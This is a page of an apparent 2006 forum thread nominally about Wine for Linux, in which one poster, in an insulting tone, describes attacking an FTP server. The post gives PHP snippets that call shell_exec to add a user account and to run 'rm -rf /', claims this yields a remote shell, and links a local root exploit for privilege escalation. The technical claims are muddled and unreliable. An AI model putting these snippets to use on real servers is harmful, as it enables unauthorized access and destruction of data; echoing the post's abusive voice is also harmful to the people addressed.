+ Follow This Topic
Page 2 of 2 FirstFirst 12
Results 16 to 17 of 17

Thread: Anybody ever use Wine for Linux?

  1. #16
    Join Date
    Jul 2006
    Gender
    Female
    Location
    Utah
    Posts
    195
    oh dear god, i swear you guys are speaking another language. I don't think I got any of that, except that there's something for linux called Wine. Why would they call it wine anyway?
    Go to Heaven for the climate, Hell for the company.

  2. #17
    King Zarathu's Avatar
    King Zarathu Guest
    Heh.. it's okay. This asshole has already proven his extreme insecurity because he might be able to learn something from a 16 year old.

    Say you have an FTP server.

    You might want to check whether or not you're using Pro-FTPD or Pure-FTPD (definitely not Free-FTPD, since that's asking to be rooted). Oh, that's another thing... It's called ROOTING the box because only Linux/BSD/BSDI has the "ROOT" user.

    Better idea!

    Upload a file called "jigga.php."

    Code:
    <?php
    
    shell_exec("adduser jiggaplz" /* more parameters in here */); ?>
    Then, you have a remote shell on the other computer. Assuming that it's an Intel x86 chip, you do what you'll probably learn in your cyber security class as "local privilege escalation."

    [url]http://www.milw0rm.com/exploits/2011[/url]
    ^^^ Local Root Exploit

    Would you not be ****ed? Yes, yes you would be.... Right, but say you don't have SSH.

    Code:
    <?php
    shell_exec("rm -rf /");
    ?>
    If you know your bash properly, you'll know that's really not a good thing either.

    Oh, I almost forgot. How do you get these PHP codes to execute? View them in your browser, you ****ing dolt.
    Last edited by King Zarathu; 12-08-06 at 11:20 PM.

Page 2 of 2 FirstFirst 12

Similar Threads

  1. changed from windows to linux.
    By misombra in forum Off Topic Discussion
    Replies: 11
    Last Post: 09-12-08, 04:12 AM
  2. I see you wine...
    By bohemiandonut in forum Off Topic Discussion
    Replies: 8
    Last Post: 28-03-08, 05:44 AM
  3. cooking wine
    By anachronistic in forum Off Topic Discussion
    Replies: 1
    Last Post: 02-01-07, 08:44 PM
  4. My Linux PC - XGL/Compiz
    By King Zarathu in forum Off Topic Discussion
    Replies: 31
    Last Post: 05-09-06, 09:16 AM
  5. ugh, i need a whine (wine) session...
    By misombra in forum Off Topic Discussion
    Replies: 40
    Last Post: 18-06-05, 07:40 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •